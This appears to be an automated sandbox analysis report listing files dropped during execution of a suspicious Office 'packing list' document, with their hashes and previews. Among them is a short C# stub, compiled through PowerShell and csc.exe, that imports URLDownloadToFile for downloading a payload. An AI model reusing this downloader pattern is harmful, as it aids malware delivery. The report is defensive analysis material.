MD5:	A0981767D618160D66397C829AF1CEFB
SHA1:	CB76812F91F24C49385A2E99E6BBC657FCB0E18F
SHA-256:	48F87B835ADFA658EADF4C6D9321B08308B0B9F8292E7013CD0751A8F52E1EAB
SHA-512:	B41798F1F835DFA57C701ABDF94EDD140F92C93D66374264E7E4D420D4E2A1A2FCB719C78EE19E5476B3F3B20E37A2350A64DDAE0AF1C6866EE8A9E4937FAEDB
Malicious:	false
Preview:	....l...............<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................p.6.).X.....S.d.....................O..O....s....\.....O.......O.\|.O.7..s......O..].u?..s.......s..p...vw.Mq...b.....8.O...sw..q.$.......d.........O.*X.s.....X.s.?q..Mq...n...b.-...d.O.6=rw................<..u.[.v....X..Z......p........................vdv......%...................................r.......x...........'...x.......(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6776DACC.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 42 x 51, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	822
Entropy (8bit):	7.616419704330421
Encrypted:	false
SSDEEP:	12:6v/7LWb/EYintm3eiVOOrbyUv5uNEXoNGJ/qiIXrqOoNUHGcvlf3vKyo1AIJc8Ni:eeinouisOPAYGK/qhLoNUHL9f3iZPpNi
MD5:	35C4E9D7C83D8F4A6792B18A15937836
SHA1:	FD15558DDC4DB88D3BB5491F2064B3C2AFBC85DF
SHA-256:	A8C99F80AB0A94ED469AE026947C14FF6C41F7EB816933EB7A54FCB937FB82B6
SHA-512:	1906EFA3A254C7E955D786C15C4E1A870B5BD9BFC815704E7BE507FEF383E5F602783C55EC33D0CB38710FC44728E97F36FE25E67B6C4934C221DB525B25D67C
Malicious:	false
Preview:	.PNG........IHDR......3.............sRGB.........gAMA......a.....pHYs..........o.d....IDAThC.=.)Q....i...B.P.D..mU+..P..Y.Q..Pjh..H.$.."..n..H.t..w......\o._r....d..{g.1..........E..p...h4.....>..L&..V..........m_,..///x.^..jEG]FWQ.L$..B.....v..g.YM..B..\|>.G.QM....J..g?.t...I.n....5........O....K..wE.u{Z........2.N..b.....Zt..A2...`@[...n...P.....,..0..P$._#e..W&..S%..~zz..8..-......1v..`...c...T...'e...m.....$..v...-.l6).D"......i?....f.....L&.....e.`.N.S.....2y...!.....%..l(..,.r.L..`..C.a.>??S&..<.D...).,.K.....Z......)..K.f.Q&..j..%.t:..(.....LX...c......-..x(..>...[..r.M...^.G..E...JQ%.Q..V.....4..L.c.J...J%...Q...C6..J... .............mj....d.d.5.....g.."({zb5./.....V?J..a.4J..TQd4..>...tQ.\.8.ZRZq3Q.;.N.bo.+.b.G[\|m..f.X,....V.x<~.k.....E.....I..........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA22645D.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 55 x 39, 8-bit colormap, interlaced
Category:	modified
Size (bytes):	1136
Entropy (8bit):	7.14782184831536
Encrypted:	false
SSDEEP:	24:ct4piFqtc+YQKOQw45DymHbFUN9F2zFg91p:Poqtc+fJX+Xarrp
MD5:	49A2F544E34D8473E29F8C4D9CB10D78
SHA1:	8B30666DE8F119B1C2E800C2B2437C09C4F6CEC9
SHA-256:	52417106494ECBBDD3A3D56DE565996562A1C0B0C29C4F43ED99E5FCB4805E07
SHA-512:	091D234ED76AFDEFC4AB3D1687FEE14DDFCFE0149F01106716ED383EB6FC8913803B26A32C69E15ECC85F6781DF09BD1C712193D8A234042E844730C56864128
Malicious:	false
Preview:	.PNG........IHDR...7...'........y....sRGB.........gAMA......a.....PLTE..............===SSS........."""...---......uuu....................'''.........\|\|\|~~~..............$$$...555..........YYY......@@@.........ddd...___.....................,,,......DDD.....000.............u...}}}......???......&&&.........UUU......HHH.........jjj777.........qqq...III......yyy......XXX..........;;;...444.....[[[.........sssppp...BBB...+++...>>>!!!mmm...AAA...###zzz%%%...TTT...xxx......JJJ....bbb...FFFNNN {{{.........VVV.................tRNS..........................................................................................................................................................^p.....pHYs..........+......IDAT8O.M.. .....+...*.`.b..{.H\.s..._H..b..\|....>...x...o.<.D-..d..&+..'L....2..g<0...1.s.E_..c)..EY..4d..DCJP/....d&.......p4........Y..$.>^..\.Y8.:.wjg.+.~.j.".v....!<.......j...+.i.R.7....Fi.yRA.2+.tK....F3..f4..m...L..z>.X.....,..hv..y..j.G.....s..`..e..<....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.213901799807932
Encrypted:	false
SSDEEP:	768:1HUDYX89n64o5bzkv8iCjOm3uv90YVXHwzYX89n64o5bzkv8iCjOm3uv90YVXHw:tUQyviF3WTNH1yviF3WTNH
MD5:	47B9AAB432F972771241AAF35DB6F070
SHA1:	C7EC4F314D74E15C96E1D8C66AD6082050A27BB7
SHA-256:	913BF8D879111378B0B7349B1703D238AC336E852583AF41E06FC5B5B76EF09B
SHA-512:	76A117683135F3574EAFF9EB7A8C2D2591063ACFF2DA77EA5316A1E82F08EA350C134C267D6AECC641745FBE693DD5445BF44F2C338DA9465BF6428AABA63622
Malicious:	false
Preview:	......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@...>........................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=.......?...v.......B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u.......................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BBEEDD3-2D62-441C-8A36-2FA05C364E08}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7720C9E4-7271-4B94-82A7-10B4BCA79EA2}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.5528375746276538
Encrypted:	false
SSDEEP:	3:Gg7NNKElClDK/lNlYdltn/lvllLl/2qlrzNBqkzNB/EPXwPxZlhWu/+6n:3pUElClDK/e3Xt7j/mXwPxZSu26
MD5:	1CDE6EB529DAF198F0A2C88465709CA0
SHA1:	B3375E057829A7A8B7D0929160F59EE2414DA928
SHA-256:	6F07DF007C3ABC15BFD89BD942FDC1A75F4C9E523C4D20C5B6441156B85B11AA
SHA-512:	052A97933AD5F2A60D511836DE796E0987F4C0DF38588B0C8B6B5B9CD3D2D53BF374349AC43EF70041D728C54647B56A3329EDD0EFCF166AF5A9D06AFEE3B564
Malicious:	false
Preview:	....E.M.B.E.D. .P.a.c.k.a.g.e..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DCA03C8-10D2-4438-96BF-FCC54A8CD09B}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	3.5282593043027797
Encrypted:	false
SSDEEP:	192:hOQ+tBZwG42b+pn0wke6hfXsWhAGLbOho20cB2uzM5Qsr8nWWLJKdQUcTCXw7N4+:0QafJv+pncfXsWhAG+0cBHkSWWdUcTTz
MD5:	7844482DE837B7A77771E3C42A771683
SHA1:	56E93764B342C84FAD56039FCF687003E5A95E3C
SHA-256:	C23EBFBFEB0D7793E6DC212083F96A5C1E5AC20FA2BC060E2EA4C4C2D72D0ADC
SHA-512:	3A9DBDC07D516CD234B3F7882AC4192326CB805EFBAF82E68A6C6AC2B29E07A5625704B1A1487B0474CF24152518DE489C7A410BCD07C8FAC01297B33E377E84
Malicious:	false
Preview:	........4.2.0.3.9.5.9.2.9.5.9.8._.&.=.).@.?.=.7.(.@.0.6.?.3.%.%.'.(.?.?.-.'.>.`.1.<...$.0.'.8.\|.`._.[...?.0.].%._...:.@.&.^.8.....1...\|.....4.3.?.>._.9.6.?.=.?.!...%.=.#.?.%.~./.;.!.+.(.,.#.^.%.`.$.!.!.?.0.?.!.].%.<.0.-.0.0.>.).!...4.3.\|.?.6.$...?.:.$.#.[.$...>.9.:.^.^.&.$....<./.5.~.-.(.,.].:.^..3.<.;.;.7.!.+.5./.^...?.;.$.-.<.(...3...=.7.1.[.?.?...8.6.+.0.6.;.$.'.8.4.5..?.<.(.?.6.@.`.!._.7.?.,.@.;.-.@.&.-.3.%._.&.-.9.&.$.%.0._.%.!.:.?.'.?.[.`.:.?.9.&./.?.&.?.1.`...3...?.'.7.%.?.8.=._.`.7.0.).4.?.-.6.[.0.$.5.`.`...\|.\|.%.~.+.$.2...6.(.)./.0.=...1.0...9.....?.#.8.6.<.?.%.7.._.>.:.1.?.?._./.2.~.4.).+...5.(.%.^.#.1.4.9.:...^.=.7.+.&.'.`...4.?./.1.1.?._.+.0.=.%.`.+.~.:.?....'.[.?.%.^.#.?.4.=.,.,._.`.\|.?...?...$.6.#..%.>.&.>.;.).+.4.?.9.?.0.?.~.&.-.`.'.?.?.8.).8.%...<.'.=...#.9.#.3.-.'.5.:..$.%.%.[.6..[.:.1.#.#.....@.=.&...3.&.=...5.`.5...?.?.8./.-.8.&.[.^.?.=.?...\|.^./.?.&.~.(.]./.#.<.~...9.[.8.?...?.4.].+.%.@.@.%...2.-...6.4.>...<...1.>.`.(.7.0.?.\|.8.`.$.?.1.,.~.[.^.8.?.0.).?.=.;.

C:\Users\user\AppData\Local\Temp\4.466364_2401 PACKING LIST.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	26110
Entropy (8bit):	7.621832725963441
Encrypted:	false
SSDEEP:	384:4X89n8bp+o5bjfTlqveNi/36emvOmHGJMHuMw9fvHZSildVX1ZZ2bm:4X89n64o5bzkv8iCjOm3uv90YVXHwm
MD5:	B9EEC5763BD7CF995AE4CB02F24A7E2B
SHA1:	9C450546C6632262C7BABD5BA1990CD0B30E14D6
SHA-256:	FB55559C6DDD496228CCB56832AAC3B21291872CAD1D4B61C5F4FC4F8F0D1BAA
SHA-512:	D3D1874B7C0984952FE7381E00FA97FDE86CB2476AEBF73FE8347B2DA274160B76BBE98AAF866CBEA5FB4ACB23E9FA04423AA1E7E1DD02EDDED92A4F7D058395
Malicious:	false
Preview:	PK..........!...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#.....q..j...# ..`.mb.-....6.B.4..K..wfv...l.......q^.E.^.c}.......7....X.....d...W{lDG...D.A....<..C...kjeTz.Z.......x.Q....-....n...J......L.....Z......!....j0A...]cL..v..:&.....1.r+g...N.g.y}{E....\.Psei.;.....!.....?`...'..A..\:....-.E..d_3..u.......FYn.G...+..:...d......."...m/.C.J`...=.....:LR.Y.\?....h.W+.o:..#........BD.......\=....,l.a.O.a.p<.c..k.l.%._.......PK..........!..U0#....L...

C:\Users\user\AppData\Local\Temp\4.466364_2401 PACKING LIST.xlsx:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\42ikhw44.bsl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\5uuj1alx.gug.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\RES950F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Wed Nov 20 09:11:22 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	4.007449865591867
Encrypted:	false
SSDEEP:	24:HB69vrq+dHNfwKPfeI+ycuZhN8GakS9XPNnqSud:wrqOtoKPm1ul7a33qSu
MD5:	276A04ED0B64EBEA7674D63FB379AF48
SHA1:	89AACDD673FB394A172D18B1A3C7F3C8E417892D
SHA-256:	C8C861A70BB3A94A61EBF2F0850F86B66522FE534628DF966590A666F38C91A0
SHA-512:	D4F6F5E0AF9B464655CA354864EB8401E900A95B36A2A62BBC5AD92131A9138BE15A6046791B12894658F9EFA427858A9523D3DB0B93781CDF5B62E0728E5D72
Malicious:	false
Preview:	L.....=g.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........S....c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP.................j..M.YJM^.7.e...........4.......C:\Users\user\AppData\Local\Temp\RES950F.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.2.m.g.g.w.z.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.

C:\Users\user\AppData\Local\Temp\b2jz0qkv.x51.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1132176578740833
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2Gak7Ynqq9XPN5Dlq5J:+RI+ycuZhN8GakS9XPNnqX
MD5:	0C6AD1971A4DB1594A4D5E9837D6659F
SHA1:	AE34149E6049017631B09D0F50FA0F7B129255D6
SHA-256:	18AF0117D8BA36365F61D9D60B7A5153FE416E560487EC211B0D7F990F372579
SHA-512:	59A35CDBCE23C37DCA6121104447F696709C598C4EEB604E7F8303A4E19FFF7EDC4C2D47E9EC7893AE13DF8DC070FB54F80C2CCA28D9322CED7E6DEB400CE2E0
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.2.m.g.g.w.z.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.2.m.g.g.w.z.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
Category:	dropped
Size (bytes):	480
Entropy (8bit):	3.827531183529261
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuwAH0kHMelQXReKJ8SRHy4HjvWbuMC5NjN6qQy:V/DTLDfuwaKXfH/WCpiy
MD5:	B0517586F4097114E790C61F2685F0D5
SHA1:	20F7482298AB96731228EBD5242CEDDFD72FF50F
SHA-256:	A738E3AF6F29EDD637630B0299F306056042EA1C73850EEE95498499F5D90237
SHA-512:	C28702017CE7FE0D34BEA38CEF48DF3BB65C63D92DDDD6F8264F7262F7AE61B8D71BCD6FEC06D0792373D15BA84FB2A1D0C26B0FE5755BC20505A9197D654BA0
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace LYPhpfZVh.{. public class PKJmdq. {. [DllImport("uRLMoN.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr LODMlIYFHF,string eO,string Lrd,uint kCMv,IntPtr sKwhSUgFd);.. }..}.

C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.26294156753755
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fu0n0zxs7+AEszIP23fupWH:p37Lvkmb6KzSWZEoMWH
MD5:	0E5A90D8DE21AA46BAB8FD4727C1EE78
SHA1:	FED9AABA69B7042F34DBF2EC34764CE3C59BB0AF
SHA-256:	F45FD783DCCDDD6E1B33C0CEDFE4A0B38C20B5FC34C51B8571AC25DE4926BC7C
SHA-512:	80654B2C40038A592F6B5EE027037FBA89400BEB59789DC1EEC0D68B182063F1364C38968CA9F30FD6E7F882BB81F9050C556F001FB1131BE5701B661E4D3A65
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.0.cs"

C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8464922010871847
Encrypted:	false
SSDEEP:	24:etGSnPBe5ekrl88NRck5w5kujf/UoItkZfFkxNwbCZ0WI+ycuZhN8GakS9XPNnq:6wskr+WQf8o/JFYwbCZX1ul7a33q
MD5:	D40C06757416FB9B1840A2E75CED3321
SHA1:	B20AE15C335C12C50E6D405F3068406D264E1C7E
SHA-256:	653E366032D42C3DE07EBAD67BFF6362756E29DCC1C9AB34D6D79AA35DCEBD56
SHA-512:	3C07D4603C0EF8CAD8EDC15BAE59684DD8521B2AC177A728A556D1E006FDC74135773B82B8C4053AB399E3FB0AAB691599C67C9E3F7B9C2B582E96ED26B35072
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....x.....x.......................................... ?.....P ......Q.........W.....b.....e.....i.....n...Q.....Q...!.Q.....Q.......!............?.......................................(..........<Module>.b2

C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
Category:	modified
Size (bytes):	864
Entropy (8bit):	5.348555897133014
Encrypted:	false
SSDEEP:	24:Aqd3ka6KzDEoeKaMD5DqBVKVrdFAMBJTH:Aika60DEoeKdDcVKdBJj
MD5:	278BD2C3A021C3D243267C3786C3BA9D
SHA1:	AFEE1CA2C3B532CC2072FC9CE4D40864288A0B78
SHA-256:	3C37E3EF139CB0464AEA1B0C8146296C5F901AD860CBCF2F579A09A4C2161CEC
SHA-512:	F03F7FCBFF623E9C8793936F4B0D7349C523F3A781EB2EC533EF3D0D9CC17EABCA3FF37AB83BBBF53D477CB3115F0FD693EEE13A765B09370D5E41B951CD5F9B
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\ks3ogfke.stg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\pysyttc1.enm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tqlejlut.uqa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\{50ACF5BD-C8D1-4B36-8782-9C563A865AC0}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025668551963191094
Encrypted:	false
SSDEEP:	6:I3DPcDEHvxggLRDQuXSHlRiZTtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPbX7ylWTvYg3J/
MD5:	16856C02C25CD6C0F7CBDF82EE6A881E
SHA1:	1E1276ACAB8DB258721221765E8A04131F637A04
SHA-256:	571C51C64FF3D3C3FCFE0B3D1D9CFB614EBAFF3B3855BAF450732CF440402B6E
SHA-512:	9D6039785AD07E382BD8AE857C02C0D0633BE37E33C12D35DCB05F212A206C92DF02A2E93BA7A84B418EE6E40AA4D3BDB38C5FB4EC2BE66AF62CB77047A9098C
Malicious:	false
Preview:	......M.eFy...z..n..&B.!..8...S,...X.F...Fa.q............................;..(.5K...%q\2K............{..L...C..j.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{A3BA7752-63FA-4119-8336-E326B7BC20E4}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025588907383190283
Encrypted:	false
SSDEEP:	6:I3DPcRp/tNsJFvxggLRx3Ag/lgloDFRXv//4tfnRujlw//+GtluJ/eRuj:I3DP4bsD1Agt3DbvYg3J/
MD5:	CFF959CD1725CCBEBE2F1EEBDC5F1BA5
SHA1:	73B90A8D1E92D7A8D848FBBAFECBBBF5FA12666A
SHA-256:	339DA2C3402CEA58D254EA848BCAF2B113B4DE8CA36ACEB6B03A4777284E6E31
SHA-512:	04CB35B91848A6E06D46F28EECAD0A587AB2DD92CD3981FC28DBEB9CA5954BC1CD9CEBB3ED490A45FDFACC822677AD02D3016CDE5AB7A334DCA6B084E13C4621
Malicious:	false
